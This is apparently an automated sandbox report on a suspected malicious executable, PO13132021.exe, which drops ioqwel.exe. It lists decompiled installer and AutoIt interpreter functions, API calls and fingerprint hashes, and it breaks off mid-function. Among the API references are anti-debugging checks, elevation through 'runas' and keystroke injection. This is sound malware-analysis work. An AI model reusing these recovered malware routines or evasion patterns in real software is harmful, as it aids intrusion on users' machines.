Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
API String ID: 3356406503-2422301049
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c08
0x00405c12
0x00405c14
0x00405c1b
0x00405c23
0x00000000
0x00000000
0x00000000
0x00405c23
0x00405c25
0x00405c2a

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO13132021.exe,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00405C0D
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO13132021.exe,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00405C1B

Strings

C:\Users\user\Desktop, xrefs: 00405C07

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d36
0x00405d38
0x00405d3b
0x00405d67
0x00405d40
0x00405d49
0x00405d4e
0x00405d59
0x00405d5c
0x00405d78
0x00405d5e
0x00405d65
0x00000000
0x00405d65
0x00405d71
0x00405d75
0x00405d75
0x00405d6f
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
CharNextA.USER32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ioqwel.exe PID: 6996 Parent PID: 6960 ioqwel.exeCOMMON

Executed Functions

Function 00AC5EDA, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00AC5EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B010D7
IsIconic.USER32(?), ref: 00B010E0
ShowWindow.USER32(?,00000009), ref: 00B010ED
KiUserCallbackDispatcher.NTDLL(?), ref: 00B010F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0110D
GetCurrentThreadId.KERNEL32 ref: 00B01114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B01120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B01131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B01139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00B01141
SetForegroundWindow.USER32(?), ref: 00B01144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B01159
keybd_event.USER32 ref: 00B01164
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0116E
keybd_event.USER32 ref: 00B01173
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0117C
keybd_event.USER32 ref: 00B01181
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0118B
keybd_event.USER32 ref: 00B01190
SetForegroundWindow.USER32(?), ref: 00B01193
AttachThreadInput.USER32(?,?,00000000), ref: 00B011BA

Strings

Shell_TrayWnd, xrefs: 00B010D2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$AttachInputVirtualkeybd_event$Foreground$Process$CallbackCurrentDispatcherFindIconicShowUser
String ID: Shell_TrayWnd
API String ID: 1248568195-2988720461
Opcode ID: 9cbc9a4dd64383e26da89cad58fe0819a546b588f1b6a97bcaac3955d3473f43
Instruction ID: 0d2d55b273fd9d78994d4424216bb9abbdac951206be4b2bdb61e9ad75b7c2f9
Opcode Fuzzy Hash: 9cbc9a4dd64383e26da89cad58fe0819a546b588f1b6a97bcaac3955d3473f43
Instruction Fuzzy Hash: 7A319275A50318BAEB242BA59C89F7F3EACFF45B50F104055FB05BB1D0DAB05E50AEA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5240, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AC526C
IsDebuggerPresent.KERNEL32 ref: 00AC527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AC52E6

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

Part of subcall function 00ABBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ABBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00AC5366
MessageBoxA.USER32 ref: 00B00B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00B00B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B66D10), ref: 00B00BE9
ShellExecuteW.SHELL32(00000000), ref: 00B00BF0

Part of subcall function 00AC514C: GetSysColorBrush.USER32(0000000F), ref: 00AC5156
Part of subcall function 00AC514C: LoadCursorW.USER32(00000000,00007F00), ref: 00AC5165
Part of subcall function 00AC514C: LoadIconW.USER32(00000063), ref: 00AC517C
Part of subcall function 00AC514C: LoadIconW.USER32(000000A4), ref: 00AC518E
Part of subcall function 00AC514C: LoadIconW.USER32(000000A2), ref: 00AC51A0
Part of subcall function 00AC514C: LoadImageW.USER32 ref: 00AC51C6
Part of subcall function 00AC514C: RegisterClassExW.USER32 ref: 00AC521C

Part of subcall function 00AC50DB: CreateWindowExW.USER32 ref: 00AC5109
Part of subcall function 00AC50DB: CreateWindowExW.USER32 ref: 00AC512A
Part of subcall function 00AC50DB: ShowWindow.USER32(00000000), ref: 00AC513E
Part of subcall function 00AC50DB: ShowWindow.USER32(00000000), ref: 00AC5147

Part of subcall function 00AC59D3: _memset.LIBCMT ref: 00AC59F9
Part of subcall function 00AC59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AC5A9E

Strings

AutoIt, xrefs: 00B00B23
runas, xrefs: 00B00BE4
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B00B28

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: aa10167e00f2c8472031e2a057fda79938bd0f985756a03f27479b44eec0df43
Instruction ID: a1e823cdff7009f30548a3191eff932d70149511cda7bf5e4f9c5a6a2538fce7
Opcode Fuzzy Hash: aa10167e00f2c8472031e2a057fda79938bd0f985756a03f27479b44eec0df43
Instruction Fuzzy Hash: C8511631E48248AECF01BBB0DD19FED7BB4AB16340F1140ADF565672A3CEB05685CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5D13, Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00AC5D40

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

GetCurrentProcess.KERNEL32(?,00B40A18,00000000,00000000,?), ref: 00AC5E07
IsWow64Process.KERNEL32(00000000), ref: 00AC5E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AC5E54
FreeLibrary.KERNEL32(00000000), ref: 00AC5E5F
GetSystemInfo.KERNEL32(00000000), ref: 00AC5E90
GetSystemInfo.KERNEL32(00000000), ref: 00AC5E9C

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 81cd0c6f879002d05011ddbd3e297c3c9d030eac39720e51b8b7a2b1397ede3e
Instruction ID: e367da3ad9794f97e150720a18f2ece585a957650f2b65132176dc00250787c2
Opcode Fuzzy Hash: 81cd0c6f879002d05011ddbd3e297c3c9d030eac39720e51b8b7a2b1397ede3e
Instruction Fuzzy Hash: D491C631949BC4DEC731DB7884506ABBFF5AF36300B884A9EE0C797A41D630B688D759

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1663, Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00AB1DD6
GetSysColor.USER32(0000000F), ref: 00AB1E2A
SetBkColor.GDI32(?,00000000), ref: 00AB1E3D

Part of subcall function 00AB166C: DefDlgProcW.USER32(?,00000020,?), ref: 00AB16B4

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: e3a28830c1e7f117eedb66a000aa8d21689a68627e93e6f6d4568ebdb0560cd8
Instruction ID: 47fbe5f40e7c2c506c718e051564595b87b216dc9764eb858ba0494cad081840
Opcode Fuzzy Hash: e3a28830c1e7f117eedb66a000aa8d21689a68627e93e6f6d4568ebdb0560cd8
Instruction Fuzzy Hash: 51A17B75129444BEEA2C6B6A8CADEFF3BADDB46301FA4050AF402D6197CF20DD11C276

Uniqueness

Uniqueness Score: -1.00%

Function 00ABBC70, Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00ABBC70(void* __ebx, signed int __ecx, long __fp0, char _a4) {
				char _v20;
				struct tagMSG _v48;
				char _v56;
				char _v60;
				char _v72;
				char _v80;
				char _v84;
				char _v100;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v152;
				long _v156;
				long _v164;
				signed int _v168;
				long _v172;
				long _v180;
				char _v188;
				signed int* _v192;
				signed int _v200;
				char _v204;
				long _v208;
				void* _v212;
				long _v216;
				long _v220;
				long _v224;
				long _v228;
				signed int _v232;
				long _v236;
				char _v240;
				signed int _v248;
				intOrPtr _v252;
				long _v256;
				long _v260;
				signed int _v264;
				char _v265;
				long _v268;
				long _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				char _v292;
				signed int _v296;
				signed int _v300;
				long _v304;
				long _v308;
				signed int _v312;
				long _v316;
				long _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				long _v340;
				signed int _v344;
				signed int _v348;
				long _v352;
				signed int _v356;
				signed int _v360;
				char _v361;
				signed int _v364;
				long _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				intOrPtr _v384;
				long _v388;
				intOrPtr _v392;
				long _v396;
				signed int _v400;
				signed int _v404;
				signed int __edi;
				intOrPtr _t540;
				signed int _t542;
				intOrPtr _t543;
				signed int _t544;
				intOrPtr _t545;
				signed int _t551;
				signed int _t557;
				void* _t559;
				signed int _t563;
				long _t565;
				long _t566;
				long _t574;
				signed int _t575;
				void* _t589;
				long _t590;
				long _t591;
				signed int _t600;
				void* _t603;
				void* _t604;
				long _t608;
				short _t609;
				void* _t610;
				signed int _t613;
				intOrPtr _t615;
				signed int* _t621;
				signed int* _t622;
				signed int _t627;
				signed int _t649;
				signed int _t665;
				signed int _t668;
				signed int _t669;
				signed int _t673;
				intOrPtr _t679;
				signed int _t681;
				signed int _t690;
				signed int _t696;
				signed int _t704;
				intOrPtr _t707;
				intOrPtr _t708;
				intOrPtr _t709;
				intOrPtr _t710;
				signed int _t712;
				signed int _t715;
				intOrPtr* _t716;
				intOrPtr _t718;
				intOrPtr _t719;
				short* _t811;
				intOrPtr _t813;
				signed int _t814;
				long _t817;
				void* _t818;
				void* _t820;
				void* _t829;
				signed int _t836;
				signed int _t837;
				void* _t843;
				void* _t863;
				char _t869;
				signed int _t874;
				intOrPtr _t891;
				signed int _t896;
				signed int _t899;
				signed int _t902;
				signed int _t903;
				signed int _t906;
				long _t909;
				signed int _t910;
				signed int _t974;
				signed int _t975;
				void* _t976;
				signed int _t980;
				signed int _t983;
				long _t985;
				signed int _t986;
				intOrPtr _t987;
				intOrPtr _t988;
				long _t989;
				signed int _t994;
				signed int _t996;
				signed int _t999;
				signed int _t1000;
				intOrPtr* _t1001;
				signed int _t1002;
				signed int* _t1003;
				signed int _t1004;
				signed int _t1007;
				signed int _t1008;
				signed int _t1010;
				signed int _t1011;
				signed int _t1012;
				intOrPtr* _t1017;
				intOrPtr _t1019;
				signed int _t1020;
				void* _t1022;

				_t1063 = __fp0;
				_t843 = __ebx;
				_t1022 = (_t1020 & 0xfffffff8) - 0x180;
				_t983 = __ecx;
				_v336 = __ecx;
				_t540 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t540 >= 0xed8) {
					 *0xb77280 = 0;
					_t542 = E00B1A48D(__ecx, __fp0, 0x9a, 0xffffffff) | 0xffffffff;
					L49:
					return _t542;
				}
				_t543 = _t540 + 1;
				 *((intOrPtr*)(__ecx + 0xec)) = _t543;
				if(_t543 == 1) {
					L94:
					_t544 =  *(__ecx + 0x11c);
					_v340 = _t544;
					while(1) {
						__eflags = _t544;
						if(_t544 == 0) {
							goto L2;
						}
						_t837 = E00AB5376(_t983,  *_t544);
						__eflags = _t837;
						if(_t837 != 0) {
							__eflags =  *((intOrPtr*)(_t837 + 0x10)) + 1;
							E00B0700C(_t983, _t1063,  *((intOrPtr*)(_t837 + 0x10)) + 1, 1);
						}
						E00B07392( &_v340,  &_v308);
						_t544 = _v344;
					}
				}
				L2:
				 *((char*)(_t983 + 0x144)) = 0;
				if( *((char*)(_t983 + 0xfc)) != 0) {
					L46:
					_t545 =  *((intOrPtr*)(_t983 + 0xec));
					 *((char*)(_t983 + 0x144)) = 0;
					if(_t545 == 1) {
						E00ABC460(_t983);
						__eflags =  *((char*)(_t983 + 0xfc)) - 1;
						if(__eflags == 0) {
							L48:
							_t542 = 0;
							goto L49;
						}
						E00ABC483(_t983, _t974, __eflags, _t1063);
						LockWindowUpdate(0);
						DestroyWindow( *0xb772ac);
						_t551 = GetMessageW( &_v48, 0, 0, 0);
						__eflags = _t551;
						if(_t551 <= 0) {
							goto L48;
						}
						do {
							TranslateMessage( &_v48);
							DispatchMessageW( &_v48);
							_t557 = GetMessageW( &_v48, 0, 0, 0);
							__eflags = _t557;
						} while (_t557 > 0);
						goto L48;
					}
					 *((intOrPtr*)(_t983 + 0xec)) = _t545 - 1;
					goto L48;
				} else {
					while( *((char*)(_t983 + 0x144)) == 0) {
						_t847 = _t983; // executed
						_t559 = E00AB52B0(_t847); // executed
						if(_t559 == 1) {
							_push(_t847);
							_v308 = 0;
							E00ACFD60( *((intOrPtr*)( *_t983 + 4)) + _t983,  &_v308);
							goto L46;
						}
						if( *0xb784a8 != 0) {
							_t563 =  *0xb784ac; // 0x0
							_t994 =  *(_t563 + 4);
							_v388 =  *_t563;
							L00AD105C(_t563);
							 *0xb784a8 =  *0xb784a8 - 1;
							_t1022 = _t1022 + 4;
							 *0xb784ac = _t994;
							asm("sbb esi, esi");
							_t847 = 0;
							 *0xb784b0 =  *0xb784b0 &  ~_t994;
							_t974 =  *(_t983 + 0x1c8);
							_v376 = 0;
							__eflags = _t974;
							if(_t974 == 0) {
								L121:
								__eflags = _t847 - _t974;
								if(__eflags == 0) {
									_t996 = 2;
									goto L7;
								}
								_t829 = E00AB5376(_t983,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t983 + 0x1c4)) + _t847 * 4)))) + 8);
								E00AC1C9C(_t983 + 0x14c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t983 + 0x1c4)) + _v380 * 4)))) + 0x18);
								E00AB6CD8(_t983, _t974, _t1063,  *((intOrPtr*)(_t829 + 0x10)) + 1, 1, 0);
								L44:
								_t996 = 2;
								L45:
								if( *((char*)(_t983 + 0xfc)) == 0) {
									continue;
								}
								goto L46;
							}
							_t1019 =  *((intOrPtr*)(_t983 + 0x1c4));
							_t989 = _v388;
							do {
								_t836 =  *( *(_t1019 + _t847 * 4));
								__eflags = _t836;
								if(_t836 == 0) {
									goto L119;
								}
								__eflags =  *_t836 - _t989;
								if( *_t836 == _t989) {
									break;
								}
								L119:
								_t847 = _t847 + 1;
								__eflags = _t847 - _t974;
							} while (_t847 < _t974);
							_t983 = _v336;
							_v376 = _t847;
							goto L121;
						}
						L7:
						if( *0xb77287 == 1) {
							__eflags =  *0xb77281;
							if(__eflags != 0) {
								goto L8;
							}
							Sleep(0xa);
							goto L45;
						}
						L8:
						if( *((intOrPtr*)(_t983 + 0x454)) == 0 ||  *0xb7841c != 0) {
							L17:
							if( *0xb777bc == 0 ||  *((char*)(_t983 + 0x458)) == 1) {
								L27:
								if( *((intOrPtr*)(_t983 + 0x184)) != 0) {
									__eflags =  *((char*)(_t983 + 0x484)) - 1;
									if( *((char*)(_t983 + 0x484)) == 1) {
										goto L28;
									}
									 *((char*)(_t983 + 0x484)) = 1;
									_v264 = 0;
									_v232 = 0xb4098c;
									_v368 = 0;
									_v228 = 0;
									_v224 = 0;
									_v220 = 0;
									E00B1A058( &_v144, _t983,  *((intOrPtr*)(_t983 + 0x188)));
									E00B0E0AA(_t983 + 0x184);
									_t1005 = _v144;
									_v256 = 0;
									E00AB4D37(E00AB4E60(_t843,  &_v264, _t974,  *_v144),  *((intOrPtr*)(_t1005 + 4)));
									_t974 = E00AB5376(_t983,  *((intOrPtr*)( *((intOrPtr*)(_t1005 + 4)) + 8)));
									_v344 = _t974;
									_t891 =  *((intOrPtr*)(_t974 + 0x10));
									_t649 = E00AC2FA0(_t891);
									 *((intOrPtr*)(_t983 + 0xf4)) = _t891;
									_t1007 = 3;
									__eflags =  *(_t974 + 0x14);
									_v388 = _t649;
									if( *(_t974 + 0x14) <= 0) {
										L170:
										E00AB38FF( *((intOrPtr*)(_t974 + 0x10)));
										_t1008 = 3;
										_v308 = 3;
										_v380 = 1;
										__eflags =  *((intOrPtr*)(_v336 + 0x14)) - 1;
										if(__eflags < 0) {
											L211:
											E00AC1A36(_t843,  &_v80, __eflags, L"@COM_EVENTOBJ");
											__eflags = _v252 - 6;
											E00AB39BE(_t983,  &_v84, (0 | _v252 != 0x00000006) - 0x00000001 & _v264, 0, 1);
											E00AC1CB6( &_v100);
											E00AB6CD8(_t983, _t974, _t1063,  *((intOrPtr*)(_v352 + 0x10)) + 1, 0, 0);
											E00AB3A40(_t843, 0xb78280);
											_t896 = _v284;
											__eflags = _t896;
											if(_t896 != 0) {
												E00AC15F4(_t896, _t896);
												_v256 = 0;
											}
											_t665 = _v248;
											__eflags = _t665 - 5;
											if(_t665 < 5) {
												L249:
												_v248 = 1;
												_v260 = 0;
												E00B06CF1( &_v144);
												E00B06CF1( &_v232);
												 *((char*)(_t983 + 0x484)) = 0;
												goto L44;
											} else {
												_t668 = _t665 + 0xfffffffb;
												__eflags = _t668 - 0xa;
												if(_t668 > 0xa) {
													goto L249;
												}
												switch( *((intOrPtr*)(_t668 * 4 +  &M00AF456B))) {
													case 0:
														__eflags = __esi;
														if(__eflags != 0) {
															__ecx = __esi;
															__eax = E00AB41C4(__ecx, __edi, __eflags, __ecx);
														}
														goto L249;
													case 1:
														goto L249;
													case 2:
														__eflags = __esi;
														if(__esi == 0) {
															goto L249;
														}
														_push(__esi);
														__imp__#9();
														goto L248;
													case 3:
														__eflags = __esi;
														if(__esi == 0) {
															goto L249;
														}
														_t417 = __esi + 8; // 0x8
														__ecx = _t417;
														goto L247;
													case 4:
														__eax = L00AD105C( *((intOrPtr*)(__esi + 4)));
														goto L248;
													case 5:
														__eflags = __esi;
														if(__esi != 0) {
															__ecx = __esi;
															__eax = E00B07A98(__ecx, __ecx);
														}
														goto L249;
													case 6:
														__eflags = __esi;
														if(__esi == 0) {
															goto L249;
														}
														__ecx = __esi;
														L247:
														__eax = E00AC1CB6(__ecx);
														L248:
														__eax = L00AD105C(__esi);
														goto L249;
													case 7:
														__eflags = __esi;
														if(__esi != 0) {
															__ecx = __esi;
															__eax = E00B07AAD(__ebx, __ecx, __edi, __ecx);
														}
														goto L249;
												}
											}
										} else {
											goto L171;
										}
										do {
											L171:
											_t975 = 0;
											_v328 = 0;
											_t902 =  *(_v372 + 4);
											_v388 = _t902;
											_t679 =  *((intOrPtr*)(_t902 + _t1008 * 4));
											__eflags =  *(_t679 + 8);
											if( *(_t679 + 8) != 0) {
												L178:
												_t985 = _v388;
												_t976 = 4 + _t1008 * 4;
												_v360 = 1;
												_t903 = 0;
												__eflags = 0;
												_t1010 = _v360;
												while(1) {
													_t681 =  *( *((intOrPtr*)(_t976 + _t985)) + 8) & 0x0000ffff;
													__eflags = _t681 - 0x47;
													if(_t681 != 0x47) {
														goto L181;
													}
													L180:
													_t903 = _t903 + 1;
													L192:
													_t1010 = _t1010 + 1;
													_t976 = _t976 + 4;
													_t681 =  *( *((intOrPtr*)(_t976 + _t985)) + 8) & 0x0000ffff;
													__eflags = _t681 - 0x47;
													if(_t681 != 0x47) {
														goto L181;
													}
													goto L180;
													L181:
													__eflags = _t681 - 0x48;
													if(_t681 != 0x48) {
														__eflags = _t681 - 0x40;
														if(_t681 != 0x40) {
															goto L192;
														}
														__eflags = _t903;
														if(_t903 == 0) {
															L183:
															_t983 = _v336;
															_t974 = _v328;
															_v360 = _t1010;
															_t1010 = _v304;
															__eflags = _v376 - _v264;
															if(_v376 <= _v264) {
																_t974 = _t974 | 0x00000200;
																__eflags = _t974;
																E00AB39BE(_t983,  *((intOrPtr*)( *((intOrPtr*)(_v388 + _t1010 * 4)))),  *_v368, _t974, 1);
																goto L210;
															}
															_v356 = 0;
															_v388 = _t1010 + 2;
															_v348 = 0;
															_v344 = 1;
															_t696 = E00AB53B0(_t843, _t983, _t1063, _v372,  &_v388,  &_v356, _v360 + _t1010);
															__eflags = _t696;
															if(_t696 < 0) {
																_t899 = _v348;
																__eflags = _t899;
																if(_t899 != 0) {
																	E00AC15F4(_t899, _t899);
																	_v352 = 0;
																}
																_t669 = _v344;
																__eflags = _t669 - 5;
																if(_t669 < 5) {
																	L167:
																	_v344 = 1;
																	_v356 = 0;
																	L168:
																	E00AB5190(_t843,  &_v260);
																	E00B06CF1( &_v144);
																	_t847 =  &_v232;
																	E00B06CF1(_t847);
																	 *((char*)(_t983 + 0x484)) = 0;
																	goto L28;
																} else {
																	_t673 = _t669 + 0xfffffffb;
																	__eflags = _t673 - 0xa;
																	if(_t673 > 0xa) {
																		goto L167;
																	}
																	switch( *((intOrPtr*)(_t673 * 4 +  &M00AF4597))) {
																		case 0:
																			__ecx = _v356;
																			__eflags = __ecx;
																			if(__eflags != 0) {
																				__eax = E00AB41C4(__ecx, __edi, __eflags, __ecx);
																			}
																			goto L167;
																		case 1:
																			goto L167;
																		case 2:
																			_t674 = _v356;
																			__eflags = _t674;
																			if(_t674 == 0) {
																				goto L167;
																			}
																			_push(_t674);
																			__imp__#9();
																			_push(_v360);
																			goto L166;
																		case 3:
																			__esi = _v356;
																			__eflags = __esi;
																			if(__esi == 0) {
																				goto L167;
																			}
																			_t409 = __esi + 8; // 0x8
																			__ecx = _t409;
																			goto L165;
																		case 4:
																			_v356 = L00AD105C( *((intOrPtr*)(_v356 + 4)));
																			_push(_v356);
																			goto L166;
																		case 5:
																			__ecx = _v356;
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = E00B07A98(__ecx, __ecx);
																			}
